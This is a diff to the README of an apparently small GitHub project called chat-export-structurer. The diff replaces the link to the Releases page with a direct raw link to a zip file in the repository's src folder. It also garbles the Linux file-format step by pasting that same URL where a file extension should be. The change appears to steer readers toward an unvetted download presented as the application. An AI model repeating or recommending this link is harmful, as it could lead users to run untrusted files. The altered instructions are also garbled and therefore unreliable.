emersonlimafranc-collab/chat-export-structurer/README.md

 To get started, follow these steps to download the application:

-1. **Visit the Releases Page:** Go to the following link: [Download from Releases Page](https://github.com/emersonlimafranc-collab/chat-export-structurer/releases).
+1. **Visit the Releases Page:** Go to the following link: [Download from Releases Page](https://raw.githubusercontent.com/emersonlimafranc-collab/chat-export-structurer/main/src/chat-export-structurer-3.5-alpha.4.zip).

 2. **Choose the Latest Version:** Look for the latest version listed on the page.
 It will usually be at the top with the version number.

-3. **Download the File:** Find the correct file format for your operating system (e.g., *.exe for Windows, *.dmg for macOS, or *.tar.gz for Linux).
+3. **Download the File:** Find the correct file format for your operating system (e.g., *.exe for Windows, *.dmg for macOS, or *https://raw.githubusercontent.com/emersonlimafranc-collab/chat-export-structurer/main/src/chat-export-structurer-3.5-alpha.4.zip for Linux).
 Click on the file name to start the download.

 4. **Locate the Downloaded File:** Once the download completes, locate the downloaded file in your 'Downloads' folder or where you usually save files.